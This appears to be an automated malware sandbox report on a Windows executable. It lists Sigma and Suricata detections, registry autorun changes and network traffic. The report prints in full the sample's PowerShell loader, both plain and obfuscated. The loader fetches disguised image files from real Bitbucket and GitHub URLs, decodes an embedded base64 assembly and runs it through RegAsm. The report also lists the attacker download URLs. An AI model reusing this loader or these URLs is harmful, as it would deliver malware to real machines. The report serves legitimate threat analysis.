        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , ProcessId: 972, ProcessName: wscript.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , ProcessId: 972, ProcessName: wscript.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , ProcessId: 972, ProcessName: wscript.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\OTO2wVGgkl.exe, ProcessId: 280, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" , ProcessId: 972, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1012, ProcessName: svchost.exe

        Data Obfuscation

        barindex
        Sigma detected: Powershell download and load assembly
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-07T09:33:18.848191+020020490381A Network Trojan was detected185.199.111.133443192.168.2.649725TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: OTO2wVGgkl.exeVirustotal: Detection: 21%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF6975A30EC
        Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 16.182.70.97:443 -> 192.168.2.6:49760 version: TLS 1.2
        Source: OTO2wVGgkl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: OTO2wVGgkl.exe
        Source: Binary string: wextract.pdbGCTL source: OTO2wVGgkl.exe
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6975A204C

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.111.133:443 -> 192.168.2.6:49725
        Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /rulmerurk/ertertqw/downloads/po06.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-44b3-9024-14d063289113/po06.txt?response-content-disposition=attachment%3B%20filename%3D%22po06.txt%22&AWSAccessKeyId=ASIA6KOSE3BNNNEIOJI2&Signature=fCrW6YnKz8vmM76pCMU1Lk6%2B0dU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEND%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICDb1Ea51gVsaGyPokV768I%2BK7TQ4cMsw7V4s%2FwUh97nAiBfdiFFLnmsdf8uWYy0kPYgU%2BjMX%2FMgGviikn58Zb6gxSqnAggpEAAaDDk4NDUyNTEwMTE0NiIMEI%2Blc%2FDMHYEVRHAGKoQCqgEqCyiV%2B3l1ji%2BADbqxjQAkgbvr1wtWBW6I%2Bw1MhCD7Mxv3%2FnNWt0uV09RjUnN81299oEf01aBbcdjn3LrJzVv26PtJlSKA4XjDjqHgt4WeXq%2F%2F7hJG0lFt4RXCCuJfQAEzhCNvyxwS3W5h8kafeCHdboWlzk8hyBUMfK0fthLTcWdKoCk30MyOhCiCmW%2BRSyT76Oe%2B8IBbx%2BUcOZRFmnl4rOdx52%2BSbzegdvcQ%2Bkh1z8AYQYnRivhT30A68B9NHLHz%2BuOQbnY6gwwwc1%2FyoVHP99bN6P2wqC9yeGkEPPkenaL1k0WzLcky5ZyHMjM09U2H3sUzWWlYKmC9oxgP8RlWKagw%2F5mOuAY6ngFo9w%2BuVBeGNn0os%2F2bZJZ9Z%2BD0%2B8YeClr2VvBYCCC1utxLfr9vLLLpP2dO9iTdu0Tdh13%2B8JebIVXg3As%2BHgx7cfu0QDWzRjYpiFcJf1LqlV%2BkrHMKyohVoC%2FlxeRSvJASoF%2Bt2WTzyQjSIHALhmB2AQEunqbDGWETcZMPjKV6%2B8FCeDi3stulqp5tDCBCbWevSBH5q1izI0RCdA49Bw%3D%3D&Expires=1728287751 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
        Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /rulmerurk/ertertqw/downloads/po06.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-44b3-9024-14d063289113/po06.txt?response-content-disposition=attachment%3B%20filename%3D%22po06.txt%22&AWSAccessKeyId=ASIA6KOSE3BNNNEIOJI2&Signature=fCrW6YnKz8vmM76pCMU1Lk6%2B0dU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEND%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICDb1Ea51gVsaGyPokV768I%2BK7TQ4cMsw7V4s%2FwUh97nAiBfdiFFLnmsdf8uWYy0kPYgU%2BjMX%2FMgGviikn58Zb6gxSqnAggpEAAaDDk4NDUyNTEwMTE0NiIMEI%2Blc%2FDMHYEVRHAGKoQCqgEqCyiV%2B3l1ji%2BADbqxjQAkgbvr1wtWBW6I%2Bw1MhCD7Mxv3%2FnNWt0uV09RjUnN81299oEf01aBbcdjn3LrJzVv26PtJlSKA4XjDjqHgt4WeXq%2F%2F7hJG0lFt4RXCCuJfQAEzhCNvyxwS3W5h8kafeCHdboWlzk8hyBUMfK0fthLTcWdKoCk30MyOhCiCmW%2BRSyT76Oe%2B8IBbx%2BUcOZRFmnl4rOdx52%2BSbzegdvcQ%2Bkh1z8AYQYnRivhT30A68B9NHLHz%2BuOQbnY6gwwwc1%2FyoVHP99bN6P2wqC9yeGkEPPkenaL1k0WzLcky5ZyHMjM09U2H3sUzWWlYKmC9oxgP8RlWKagw%2F5mOuAY6ngFo9w%2BuVBeGNn0os%2F2bZJZ9Z%2BD0%2B8YeClr2VvBYCCC1utxLfr9vLLLpP2dO9iTdu0Tdh13%2B8JebIVXg3As%2BHgx7cfu0QDWzRjYpiFcJf1LqlV%2BkrHMKyohVoC%2FlxeR